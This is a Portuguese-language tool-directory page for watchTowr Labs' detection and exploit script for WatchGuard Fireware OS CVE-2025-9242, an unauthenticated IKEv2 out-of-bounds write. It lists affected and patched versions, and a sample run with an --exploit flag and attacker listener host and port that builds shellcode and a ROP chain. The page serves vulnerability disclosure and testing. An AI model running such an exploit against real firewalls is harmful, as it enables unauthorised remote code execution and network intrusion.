Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
watchTowr-vs-WatchGuard-CVE-2025-9242 — Ferramenta baseada em Python para geração de artefatos de detecção e exploit para o WatchGuard Fireware OS CVE-2025-9242, uma vulnerabilidade de escrita fora dos limites no IKEv2 sem autenticação. Automatiza a identificação de versão, verificação de vulnerabilidade, construção de payloads de shellcode e execução de cadeia ROP. | Kitploit
Ferramentas/GitHubGitHub/watchtowrlabs/watchtowr-vs-watchguard-cve-2025-9242
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoExploração de Binários
GitHubwatchtowrlabs/watchtowr-vs-watchguard-cve-2025-9242

watchTowr-vs-WatchGuard-CVE-2025-9242

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1351há 6 mesesAinda não revisado

Sobre

Ferramenta baseada em Python para geração de artefatos de detecção e exploit para o WatchGuard Fireware OS CVE-2025-9242, uma vulnerabilidade de escrita fora dos limites no IKEv2 sem autenticação. Automatiza a identificação de versão, verificação de vulnerabilidade, construção de payloads de shellcode e execução de cadeia ROP.

Compartilhar

watchTowr-vs-WatchGuard-CVE-2025-9242

Gerador de Artefatos de Detecção para WatchGuard CVE-2025-9242

https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f

Consulte nossa publicação no blog para detalhes técnicos

Detecção em Ação

root@kitploit:~
python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
                         __         ___  ___________ 
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-WatchGuard-CVE-2025-9242.py

        (*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator

          - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-9242]


[#] Sending IKEv2 SA Init with default transform
[#] WatchGuard Firmware Version: 12.11.3
[#] WatchGuard Build Number: 719894
[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4
[+] Default IKEv2 service found
[#] Verifying if IKEv2 service is vulnerable...
[+] IKEv2 service is vulnerable to CVE-2025-9242
[#] Building shellcode payload...
[#] Building ROP chain...
[#] Sending exploit payload to 192.168.56.1:31337

Descrição

Este script tenta detectar se o WatchGuard OS está vulnerável ao CVE-2025-9242.

Versões Afetadas

As seguintes versões do WatchGuard OS são afetadas:

Versão VulnerávelVersão Corrigida
2025.12025.1.1
12.x12.11.4
12.5.x (modelos T15 e T35)12.5.13
12.3.1 (lançamento certificado FIPS)12.3.1_Update3 (B722811)
11.xFim de vida

Para mais informações, visite WatchGuard Firebox iked Out of Bounds Write Vulnerability

Siga watchTowr Labs

Para as pesquisas de segurança mais recentes, siga a equipe de Laboratórios do watchTowr

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

Baixar ferramenta